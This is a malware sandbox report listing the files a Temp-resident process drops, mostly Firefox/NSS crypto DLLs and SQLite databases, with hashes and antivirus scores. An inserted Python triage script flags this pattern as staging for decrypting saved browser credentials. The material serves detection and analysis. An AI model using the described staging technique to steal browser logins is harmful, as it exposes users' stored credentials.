SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\frAQBc8Wsa
Process: C:\Users\user\AppData\Local\Temp\7801.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\rQF69AzBla
Process: C:\Users\user\AppData\Local\Temp\7801.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.7006690334145785
Encrypted: false
SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5: A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1: 1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256: 8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512: 1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
Process: C:\Users\user\AppData\Local\Temp\7801.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 123344
Entropy (8bit): 6.504957642040826
Encrypted: false
SSDEEP: 1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5: F92586E9CC1F12223B7EEB1A8CD4323C
SHA1: F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256: A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512: 5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26064
                                                                                                                                                                                                        Entropy (8bit):5.981632010321345
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
                                                                                                                                                                                                        MD5:A7FABF3DCE008915CEE4FFC338FA1CE6
                                                                                                                                                                                                        SHA1:F411FB41181C79FBA0516D5674D07444E98E7C92
                                                                                                                                                                                                        SHA-256:D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
                                                                                                                                                                                                        SHA-512:3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):70608
                                                                                                                                                                                                        Entropy (8bit):5.389701090881864
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
                                                                                                                                                                                                        MD5:5243F66EF4595D9D8902069EED8777E2
                                                                                                                                                                                                        SHA1:1FB7F82CD5F1376C5378CD88F853727AB1CC439E
                                                                                                                                                                                                        SHA-256:621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
                                                                                                                                                                                                        SHA-512:A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&|.J...K&|.J...K&|uK...K&|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19920
                                                                                                                                                                                                        Entropy (8bit):6.2121285323374185
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                                                                                                                        MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                                                                                                                        SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                                                                                                                        SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                                                                                                                        SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):117712
                                                                                                                                                                                                        Entropy (8bit):6.598338256653691
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
                                                                                                                                                                                                        MD5:A436472B0A7B2EB2C4F53FDF512D0CF8
                                                                                                                                                                                                        SHA1:963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
                                                                                                                                                                                                        SHA-256:87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
                                                                                                                                                                                                        SHA-512:89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{*7.{*7.{*..x+>.{*..~+I.{*...+%.{*.x+$.{*..+'.{*.~+..{*..z+4.{*7.z*A.{*..~+>.{*..{+6.{*...*6.{*..y+6.{*Rich7.{*........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2828315
                                                                                                                                                                                                        Entropy (8bit):7.998625956067725
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                                                                                                                                        MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                                                                                                                                        SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                                                                                                                                        SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                                                                                                                                        SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: PK.........znN<..{r....i......nssdbm3.dll...|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K.*...........gr..L..*H...v....6[*...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3.*...S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.|k.5...XF.Y..lVVW..C..|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..|!......O....M....>.>.$\.%..L.zF.l...3
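Read as a set rather than file by file, the entries above tell a story the per-file verdicts hide: AccessibleHandler.dll, AccessibleMarshal.dll, IA2Marshal.dll, MapiProxy.dll, breakpadinjector.dll and freebl3.dll are all files that ship in a Firefox install directory (freebl3.dll, and the nssdbm3.dll visible in the first local file header of the zip preview, belong to Mozilla's NSS crypto library, which Firefox uses to protect saved logins), every one of them was written by 7801.exe from %TEMP% into a random-named directory under AppData\LocalLow, and every one scores 0-3% on AV with "Malicious: false". That is what staging unmodified vendor libraries for credential decryption looks like, so a clean score on each file is expected and proves nothing about the drop. The Python below is an added example, not part of this report or of any sandbox or Mozilla tooling: it parses records in the layout used above and applies that context rule. The Firefox DLL name list, the 5% detection threshold, the 7.9 entropy cut-off and the SHA-256 allowlist (which the analyst would fill from a clean Firefox install) are assumptions; the sample text is constructed from the entries above with previews truncated.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Assumed list of DLLs shipped in a Firefox install directory: the NSS crypto
# libraries plus accessibility, MAPI and crash-reporter helpers.
FIREFOX_DIST_DLLS: Set[str] = {
    "accessiblehandler.dll", "accessiblemarshal.dll", "ia2marshal.dll",
    "mapiproxy.dll", "breakpadinjector.dll", "freebl3.dll", "nss3.dll",
    "nssdbm3.dll", "softokn3.dll", "mozglue.dll",
}

# Constructed sample in the report's own Key:Value layout; values copied from
# the entries above, previews truncated. The first line is the tail of an
# earlier record and must be skipped by the parser.
SAMPLE_REPORT = r"""
Preview: SQLite format 3......@ .........
C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
SHA-256:621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
Antivirus:
• Antivirus: Metadefender, Detection: 3%, Browse
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.998625956067725
Encrypted:true
Preview: PK.........znN<..{r....i......nssdbm3.dll...|...8...N..Y..6
C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
Antivirus:
• Antivirus: Metadefender, Detection: 0%, Browse
"""

RECORD_START = re.compile(r"^[A-Za-z]:\\")
KEY_VALUE = re.compile(r"^([^:•]+):\s*(.*)$")
AV_BULLET = re.compile(r"^•\s*Antivirus:\s*([^,]+),\s*Detection:\s*(\d+)%")
DLL_NAME = re.compile(r"[\w-]+\.dll", re.IGNORECASE)


@dataclass
class DroppedFile:
    path: str
    fields: Dict[str, str] = field(default_factory=dict)
    av: Dict[str, int] = field(default_factory=dict)  # engine -> detection %

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1].lower()

    def preview_dll_names(self) -> List[str]:
        # A zip preview shows the first local file header; the member name in
        # it is plaintext even when the member data is compressed or encrypted.
        return DLL_NAME.findall(self.fields.get("Preview", ""))


def parse_dropped_files(text: str) -> List[DroppedFile]:
    """A record starts at a Windows path; the lines after it belong to it."""
    records: List[DroppedFile] = []
    for line in (raw.strip() for raw in text.splitlines()):
        if RECORD_START.match(line):
            records.append(DroppedFile(path=line))
        elif records and (m := AV_BULLET.match(line)):
            records[-1].av[m.group(1).strip()] = int(m.group(2))
        elif records and (m := KEY_VALUE.match(line)):
            records[-1].fields[m.group(1).strip()] = m.group(2).strip()
    return records


def triage(rec: DroppedFile) -> Set[str]:
    """Context tags: vendor DLL staged under LocalLow by a Temp-resident process."""
    tags: Set[str] = set()
    ftype = rec.fields.get("File Type", "")
    proc = rec.fields.get("Process", "").lower()
    entropy = float(rec.fields.get("Entropy (8bit)", "0"))
    if (ftype.startswith("PE32 executable (DLL)")
            and rec.name in FIREFOX_DIST_DLLS
            and "\\appdata\\local\\temp\\" in proc
            and "\\appdata\\locallow\\" in rec.path.lower()):
        tags.add("vendor-dll-staged-by-temp-process")
    if ftype.startswith("Zip archive") and entropy >= 7.9:  # assumed cut-off
        tags.add("high-entropy-archive")
        if any(n.lower() in FIREFOX_DIST_DLLS for n in rec.preview_dll_names()):
            tags.add("archive-carries-vendor-dll")
    if rec.av and max(rec.av.values()) <= 5:  # assumed threshold
        tags.add("low-av-detection")  # expected for an unmodified vendor DLL
    return tags


def unverified_vendor_dlls(records: List[DroppedFile], allowlist: Set[str]) -> List[str]:
    """Staged vendor DLLs whose SHA-256 is absent from the analyst's allowlist."""
    known = {h.upper() for h in allowlist}
    return [r.name for r in records
            if "vendor-dll-staged-by-temp-process" in triage(r)
            and r.fields.get("SHA-256", "").upper() not in known]


def triage_report(text: str) -> Dict[str, Set[str]]:
    return {r.name: triage(r) for r in parse_dropped_files(text)}
```

`triage_report(SAMPLE_REPORT)` tags both DLLs as staged vendor libraries with low AV detection and the zip as a high-entropy archive carrying a vendor DLL name; `unverified_vendor_dlls` then lists which staged DLLs still need their hash compared against a known-good Firefox copy. The point of the hash step is that an unmodified vendor DLL is not the threat, the process that staged it is; a DLL with the right name but an unknown hash is the case that deserves a closer look.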
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):334288
                                                                                                                                                                                                        Entropy (8bit):6.808908775107082
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
                                                                                                                                                                                                        MD5:60ACD24430204AD2DC7F148B8CFE9BDC
                                                                                                                                                                                                        SHA1:989F377B9117D7CB21CBE92A4117F88F9C7693D9
                                                                                                                                                                                                        SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
                                                                                                                                                                                                        SHA-512:626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):132048
                                                                                                                                                                                                        Entropy (8bit):6.627391684128337
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
                                                                                                                                                                                                        MD5:5A49EBF1DA3D5971B62A4FD295A71ECF
                                                                                                                                                                                                        SHA1:40917474EF7914126D62BA7CDBF6CF54D227AA20
                                                                                                                                                                                                        SHA-256:2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
                                                                                                                                                                                                        SHA-512:A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20432
                                                                                                                                                                                                        Entropy (8bit):6.337521751154348
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
                                                                                                                                                                                                        MD5:4FE544DFC7CDAA026DA6EDA09CAD66C4
                                                                                                                                                                                                        SHA1:85D21E5F5F72A4808F02F4EA14AA65154E52CE99
                                                                                                                                                                                                        SHA-256:3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
                                                                                                                                                                                                        SHA-512:5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):55760
                                                                                                                                                                                                        Entropy (8bit):6.738700405402967
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
                                                                                                                                                                                                        MD5:56E982D4C380C9CD24852564A8C02C3E
                                                                                                                                                                                                        SHA1:F9031327208176059CD03F53C8C5934C1050897F
                                                                                                                                                                                                        SHA-256:7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
                                                                                                                                                                                                        SHA-512:92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22480
                                                                                                                                                                                                        Entropy (8bit):6.528357540966124
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
                                                                                                                                                                                                        MD5:96B879B611B2BBEE85DF18884039C2B8
                                                                                                                                                                                                        SHA1:00794796ACAC3899C1FB9ABBF123FEF3CC641624
                                                                                                                                                                                                        SHA-256:7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
                                                                                                                                                                                                        SHA-512:DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):92624
                                                                                                                                                                                                        Entropy (8bit):6.639527605275762
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
                                                                                                                                                                                                        MD5:94919DEA9C745FBB01653F3FDAE59C23
                                                                                                                                                                                                        SHA1:99181610D8C9255947D7B2134CDB4825BD5A25FF
                                                                                                                                                                                                        SHA-256:BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
                                                                                                                                                                                                        SHA-512:1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24016
                                                                                                                                                                                                        Entropy (8bit):6.532540890393685
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
                                                                                                                                                                                                        MD5:6099C438F37E949C4C541E61E88098B7
                                                                                                                                                                                                        SHA1:0AD03A6F626385554A885BD742DFE5B59BC944F5
                                                                                                                                                                                                        SHA-256:46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
                                                                                                                                                                                                        SHA-512:97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):16336
Entropy (8bit):6.437762295038996
Encrypted:false
SSDEEP:192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:false
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):144848
Entropy (8bit):6.54005414297208
Encrypted:false
SSDEEP:3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:4E8DF049F3459FA94AB6AD387F3561AC
